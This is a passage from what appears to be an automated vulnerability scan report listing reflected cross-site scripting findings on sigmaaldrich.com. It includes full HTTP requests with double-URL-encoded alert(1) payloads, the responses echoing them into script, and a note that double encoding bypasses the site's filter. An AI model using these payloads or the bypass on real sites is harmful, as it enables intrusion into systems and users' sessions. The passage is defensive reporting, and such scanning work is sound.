Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 5 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /etc/medialib/sigma-aldrich/headers/endeca-search-anddf246%2522%253balert%25281%2529%252f%252f46ecedfb122/baynotejs.Par.0001.File.tmp/baynote.js HTTP/1.1
Accept: */*
Referer: http://www.sigmaaldrich.com/united-states.html
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: www.sigmaaldrich.com
Proxy-Connection: Keep-Alive
Cookie: cmTPSet=Y; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; SialLocaleDef=CountryCode~US|WebLang~-1|; country=USA; fsr.a=1289930574273; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"Unknown","MemberId":"Unknown","SiteId":"SA"}}

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:05:17 GMT
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/
Content-Length: 28995


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/etc/medialib/sigma-aldrich/headers/endeca-search-anddf246";alert(1)//46ecedfb122/baynotejs.Par.0001.File.tmp/baynote.js","E404") ;
   </script>
...[SNIP]...

1.426. http://www.sigmaaldrich.com/etc/medialib/sigma-aldrich/headers/endeca-search-and/baynotejs.Par.0001.File.tmp/baynote.js [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /etc/medialib/sigma-aldrich/headers/endeca-search-and/baynotejs.Par.0001.File.tmp/baynote.js

Issue detail

The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 16baf%2522%253balert%25281%2529%252f%252f4955a060821 was submitted in the REST URL parameter 6. This input was echoed as 16baf";alert(1)//4955a060821 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 6 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /etc/medialib/sigma-aldrich/headers/endeca-search-and/16baf%2522%253balert%25281%2529%252f%252f4955a060821/baynote.js HTTP/1.1
Accept: */*
Referer: http://www.sigmaaldrich.com/united-states.html
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: www.sigmaaldrich.com
Proxy-Connection: Keep-Alive
Cookie: cmTPSet=Y; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; SialLocaleDef=CountryCode~US|WebLang~-1|; country=USA; fsr.a=1289930574273; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"Unknown","MemberId":"Unknown","SiteId":"SA"}}

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:05:20 GMT
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/
Content-Length: 28968


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/etc/medialib/sigma-aldrich/headers/endeca-search-and/16baf";alert(1)//4955a060821/baynote.js","E404") ;
   </script>
...[SNIP]...

1.427. http://www.sigmaaldrich.com/etc/medialib/sigma-aldrich/headers/endeca-search-and/catalogutilitiesjs.Par.0001.File.tmp/catalogutilities.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /etc/medialib/sigma-aldrich/headers/endeca-search-and/catalogutilitiesjs.Par.0001.File.tmp/catalogutilities.js

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f8269%2522%253balert%25281%2529%252f%252f6f5229b5869 was submitted in the REST URL parameter 1. This input was echoed as f8269";alert(1)//6f5229b5869 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /etcf8269%2522%253balert%25281%2529%252f%252f6f5229b5869/medialib/sigma-aldrich/headers/endeca-search-and/catalogutilitiesjs.Par.0001.File.tmp/catalogutilities.js HTTP/1.1
Accept: */*
Referer: http://www.sigmaaldrich.com/catalog/Lookup.do?N5=All&N3=mode+matchpartialmax&N4=%60&D7=0&D10=%60&N1=S_ID&ST=RS&N25=0&F=PR
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: www.sigmaaldrich.com
Proxy-Connection: Keep-Alive
Cookie: cmTPSet=Y; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; SialLocaleDef=CountryCode~US|WebLang~-1|; country=USA; cmRS=&t1=1289930574210&t2=1289930575333&t3=1289930582775&fti=1289930582775&fn=SearchForm%3A0%3Bemailfriend%3A1%3Bsearchsirnasidebox%3A2%3B&ac=0:S&fd=&uer=&fu=javascript%3AformHandlerTwo%28%29&pi=/content/sigma-aldrich/the-americas/united-states&ho=cm.sigmaaldrich.com/eluminate%3F&ci=90142934; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"Unknown","MemberId":"Unknown","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":1,"to":3,"c":"http://www.sigmaaldrich.com/united-states.html","lc":{"d0":{"v":1,"s":false}},"cd":0,"sd":0}; bn_u=6923287736776754713

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:05:14 GMT
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/
Content-Length: 29013


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/etcf8269";alert(1)//6f5229b5869/medialib/sigma-aldrich/headers/endeca-search-and/catalogutilitiesjs.Par.0001.File.tmp/catalogutilities.js","E404") ;
   </script>
...[SNIP]...

1.428. http://www.sigmaaldrich.com/etc/medialib/sigma-aldrich/headers/endeca-search-and/catalogutilitiesjs.Par.0001.File.tmp/catalogutilities.js [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /etc/medialib/sigma-aldrich/headers/endeca-search-and/catalogutilitiesjs.Par.0001.File.tmp/catalogutilities.js

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 407c3%2522%253balert%25281%2529%252f%252f53850a8ac79 was submitted in the REST URL parameter 2. This input was echoed as 407c3";alert(1)//53850a8ac79 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /etc/medialib407c3%2522%253balert%25281%2529%252f%252f53850a8ac79/sigma-aldrich/headers/endeca-search-and/catalogutilitiesjs.Par.0001.File.tmp/catalogutilities.js HTTP/1.1
Accept: */*
Referer: http://www.sigmaaldrich.com/catalog/Lookup.do?N5=All&N3=mode+matchpartialmax&N4=%60&D7=0&D10=%60&N1=S_ID&ST=RS&N25=0&F=PR
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: www.sigmaaldrich.com
Proxy-Connection: Keep-Alive
Cookie: cmTPSet=Y; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; SialLocaleDef=CountryCode~US|WebLang~-1|; country=USA; cmRS=&t1=1289930574210&t2=1289930575333&t3=1289930582775&fti=1289930582775&fn=SearchForm%3A0%3Bemailfriend%3A1%3Bsearchsirnasidebox%3A2%3B&ac=0:S&fd=&uer=&fu=javascript%3AformHandlerTwo%28%29&pi=/content/sigma-aldrich/the-americas/united-states&ho=cm.sigmaaldrich.com/eluminate%3F&ci=90142934; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"Unknown","MemberId":"Unknown","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":1,"to":3,"c":"http://www.sigmaaldrich.com/united-states.html","lc":{"d0":{"v":1,"s":false}},"cd":0,"sd":0}; bn_u=6923287736776754713

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:05:17 GMT
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/
Content-Length: 29013


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/etc/medialib407c3";alert(1)//53850a8ac79/sigma-aldrich/headers/endeca-search-and/catalogutilitiesjs.Par.0001.File.tmp/catalogutilities.js","E404") ;
   </script>
...[SNIP]...

1.429. http://www.sigmaaldrich.com/etc/medialib/sigma-aldrich/headers/endeca-search-and/catalogutilitiesjs.Par.0001.File.tmp/catalogutilities.js [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /etc/medialib/sigma-aldrich/headers/endeca-search-and/catalogutilitiesjs.Par.0001.File.tmp/catalogutilities.js

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e9c69%2522%253balert%25281%2529%252f%252fd003cb44276 was submitted in the REST URL parameter 3. This input was echoed as e9c69";alert(1)//d003cb44276 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /etc/medialib/sigma-aldriche9c69%2522%253balert%25281%2529%252f%252fd003cb44276/headers/endeca-search-and/catalogutilitiesjs.Par.0001.File.tmp/catalogutilities.js HTTP/1.1
Accept: */*
Referer: http://www.sigmaaldrich.com/catalog/Lookup.do?N5=All&N3=mode+matchpartialmax&N4=%60&D7=0&D10=%60&N1=S_ID&ST=RS&N25=0&F=PR
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: www.sigmaaldrich.com
Proxy-Connection: Keep-Alive
Cookie: cmTPSet=Y; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; SialLocaleDef=CountryCode~US|WebLang~-1|; country=USA; cmRS=&t1=1289930574210&t2=1289930575333&t3=1289930582775&fti=1289930582775&fn=SearchForm%3A0%3Bemailfriend%3A1%3Bsearchsirnasidebox%3A2%3B&ac=0:S&fd=&uer=&fu=javascript%3AformHandlerTwo%28%29&pi=/content/sigma-aldrich/the-americas/united-states&ho=cm.sigmaaldrich.com/eluminate%3F&ci=90142934; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"Unknown","MemberId":"Unknown","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":1,"to":3,"c":"http://www.sigmaaldrich.com/united-states.html","lc":{"d0":{"v":1,"s":false}},"cd":0,"sd":0}; bn_u=6923287736776754713

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:05:20 GMT
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/
Content-Length: 29013


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/etc/medialib/sigma-aldriche9c69";alert(1)//d003cb44276/headers/endeca-search-and/catalogutilitiesjs.Par.0001.File.tmp/catalogutilities.js","E404") ;
   </script>
...[SNIP]...

1.430. http://www.sigmaaldrich.com/etc/medialib/sigma-aldrich/headers/endeca-search-and/catalogutilitiesjs.Par.0001.File.tmp/catalogutilities.js [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /etc/medialib/sigma-aldrich/headers/endeca-search-and/catalogutilitiesjs.Par.0001.File.tmp/catalogutilities.js

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4153a%2522%253balert%25281%2529%252f%252fe13ad80bc0f was submitted in the REST URL parameter 4. This input was echoed as 4153a";alert(1)//e13ad80bc0f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 4 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /etc/medialib/sigma-aldrich/headers4153a%2522%253balert%25281%2529%252f%252fe13ad80bc0f/endeca-search-and/catalogutilitiesjs.Par.0001.File.tmp/catalogutilities.js HTTP/1.1
Accept: */*
Referer: http://www.sigmaaldrich.com/catalog/Lookup.do?N5=All&N3=mode+matchpartialmax&N4=%60&D7=0&D10=%60&N1=S_ID&ST=RS&N25=0&F=PR
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: www.sigmaaldrich.com
Proxy-Connection: Keep-Alive
Cookie: cmTPSet=Y; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; SialLocaleDef=CountryCode~US|WebLang~-1|; country=USA; cmRS=&t1=1289930574210&t2=1289930575333&t3=1289930582775&fti=1289930582775&fn=SearchForm%3A0%3Bemailfriend%3A1%3Bsearchsirnasidebox%3A2%3B&ac=0:S&fd=&uer=&fu=javascript%3AformHandlerTwo%28%29&pi=/content/sigma-aldrich/the-americas/united-states&ho=cm.sigmaaldrich.com/eluminate%3F&ci=90142934; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"Unknown","MemberId":"Unknown","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":1,"to":3,"c":"http://www.sigmaaldrich.com/united-states.html","lc":{"d0":{"v":1,"s":false}},"cd":0,"sd":0}; bn_u=6923287736776754713

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:05:23 GMT
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/
Content-Length: 29013


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/etc/medialib/sigma-aldrich/headers4153a";alert(1)//e13ad80bc0f/endeca-search-and/catalogutilitiesjs.Par.0001.File.tmp/catalogutilities.js","E404") ;
   </script>
...[SNIP]...

1.431. http://www.sigmaaldrich.com/etc/medialib/sigma-aldrich/headers/endeca-search-and/catalogutilitiesjs.Par.0001.File.tmp/catalogutilities.js [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /etc/medialib/sigma-aldrich/headers/endeca-search-and/catalogutilitiesjs.Par.0001.File.tmp/catalogutilities.js

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload df8b0%2522%253balert%25281%2529%252f%252f5e392adb54a was submitted in the REST URL parameter 5. This input was echoed as df8b0";alert(1)//5e392adb54a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 5 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /etc/medialib/sigma-aldrich/headers/endeca-search-anddf8b0%2522%253balert%25281%2529%252f%252f5e392adb54a/catalogutilitiesjs.Par.0001.File.tmp/catalogutilities.js HTTP/1.1
Accept: */*
Referer: http://www.sigmaaldrich.com/catalog/Lookup.do?N5=All&N3=mode+matchpartialmax&N4=%60&D7=0&D10=%60&N1=S_ID&ST=RS&N25=0&F=PR
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: www.sigmaaldrich.com
Proxy-Connection: Keep-Alive
Cookie: cmTPSet=Y; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; SialLocaleDef=CountryCode~US|WebLang~-1|; country=USA; cmRS=&t1=1289930574210&t2=1289930575333&t3=1289930582775&fti=1289930582775&fn=SearchForm%3A0%3Bemailfriend%3A1%3Bsearchsirnasidebox%3A2%3B&ac=0:S&fd=&uer=&fu=javascript%3AformHandlerTwo%28%29&pi=/content/sigma-aldrich/the-americas/united-states&ho=cm.sigmaaldrich.com/eluminate%3F&ci=90142934; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"Unknown","MemberId":"Unknown","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":1,"to":3,"c":"http://www.sigmaaldrich.com/united-states.html","lc":{"d0":{"v":1,"s":false}},"cd":0,"sd":0}; bn_u=6923287736776754713

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:05:26 GMT
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/
Content-Length: 29013


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/etc/medialib/sigma-aldrich/headers/endeca-search-anddf8b0";alert(1)//5e392adb54a/catalogutilitiesjs.Par.0001.File.tmp/catalogutilities.js","E404") ;
   </script>
...[SNIP]...

1.432. http://www.sigmaaldrich.com/etc/medialib/sigma-aldrich/headers/endeca-search-and/catalogutilitiesjs.Par.0001.File.tmp/catalogutilities.js [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /etc/medialib/sigma-aldrich/headers/endeca-search-and/catalogutilitiesjs.Par.0001.File.tmp/catalogutilities.js

Issue detail

The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5f6e0%2522%253balert%25281%2529%252f%252f5815abce9b2 was submitted in the REST URL parameter 6. This input was echoed as 5f6e0";alert(1)//5815abce9b2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 6 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /etc/medialib/sigma-aldrich/headers/endeca-search-and/5f6e0%2522%253balert%25281%2529%252f%252f5815abce9b2/catalogutilities.js HTTP/1.1
Accept: */*
Referer: http://www.sigmaaldrich.com/catalog/Lookup.do?N5=All&N3=mode+matchpartialmax&N4=%60&D7=0&D10=%60&N1=S_ID&ST=RS&N25=0&F=PR
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: www.sigmaaldrich.com
Proxy-Connection: Keep-Alive
Cookie: cmTPSet=Y; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; SialLocaleDef=CountryCode~US|WebLang~-1|; country=USA; cmRS=&t1=1289930574210&t2=1289930575333&t3=1289930582775&fti=1289930582775&fn=SearchForm%3A0%3Bemailfriend%3A1%3Bsearchsirnasidebox%3A2%3B&ac=0:S&fd=&uer=&fu=javascript%3AformHandlerTwo%28%29&pi=/content/sigma-aldrich/the-americas/united-states&ho=cm.sigmaaldrich.com/eluminate%3F&ci=90142934; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"Unknown","MemberId":"Unknown","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":1,"to":3,"c":"http://www.sigmaaldrich.com/united-states.html","lc":{"d0":{"v":1,"s":false}},"cd":0,"sd":0}; bn_u=6923287736776754713

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:05:28 GMT
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/
Content-Length: 28977


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/etc/medialib/sigma-aldrich/headers/endeca-search-and/5f6e0";alert(1)//5815abce9b2/catalogutilities.js","E404") ;
   </script>
...[SNIP]...

1.433. http://www.sigmaaldrich.com/etc/medialib/sigma-aldrich/headers/endeca-search-and/event-minjs.Par.0001.File.tmp/event-min.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /etc/medialib/sigma-aldrich/headers/endeca-search-and/event-minjs.Par.0001.File.tmp/event-min.js

Issue detail

